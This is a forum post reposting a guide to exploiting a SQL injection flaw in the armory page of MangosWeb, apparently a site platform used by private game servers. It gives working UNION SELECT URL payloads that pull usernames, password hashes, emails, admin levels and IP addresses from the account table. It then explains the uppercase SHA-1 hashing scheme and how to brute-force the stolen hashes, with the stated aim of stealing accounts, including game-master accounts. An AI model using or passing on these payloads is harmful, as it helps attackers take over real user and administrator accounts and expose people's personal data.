Found this guide while browsing. looks neat.
This is not an ingame exploit. It can be used to steal usernames and passwords, evem gm accounts. First of all the following guide is only for the servers that use Mangosweb to run their homepage. This is a very popular site and many private servers run Mangosweb.
The exploit is hidden within the armory. With a SQL injection we can extract passwords or other sensitive informations. Access the site. For example:
www.target.domain/index.php
Replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select 11,22,33,44--
If you will see 11 on the resulting page, the following will work. If you don't see anything try changing char=1 to char=2 or any other number, until you find a character it doesn't exist.
Now replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select <field>,null,null,null from <database> where <condition>--
We will work with <database>=realmd.account
The <field> can be:
id - id of the account
username - name of the account
I - password of the account
gmlevel - 0,1,2 or 3 account level
email - the registration email
joindate - the date the account was made on
last_ip - the ip the user last time logged into the server
and others...
And the <condition> for example can look like this:
username='admin'
gmlevel=3
id=5
gmlevel=2 and id<100
and other combinations.
So if you want to retrieve the password of the user john you will replace
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select I,null,null,null from realmd.account where username='john'--
If everything went well you should see a 40 character encrypted password like this:
7e27e687f56923bec2ff792cbe983d8ff5c5fc10
This is the hash of the password encrypted with SHA-1 (160 bits). So presuming john's password was "test". The encrypted password above resulted from JOHN:TEST . So you see, the encryted password also contains the username, separated from the password with ":".
SHA1(CONCAT(UPPER('john'),':',UPPER('test'))) - this is the line that made this 7e27e687f56923bec2ff792cbe983d8ff5c5fc10. You can see the upper() function, that means that all passwords aren't case sensitive, and are transformed into uppercase at the creation.
Because SHA-1 is one-way, you can't reverse engineer it. You must brute-force it, using the prefix JOHN: . Also you must exclude lowercase characters while brute-forcing, use only 0-9,A-Z and perhaps special characters. Have fun. I will write a guide perhaps if you are interested... until then... try cracking it on you own.
All credits goes to xkyve from Deathsoft.com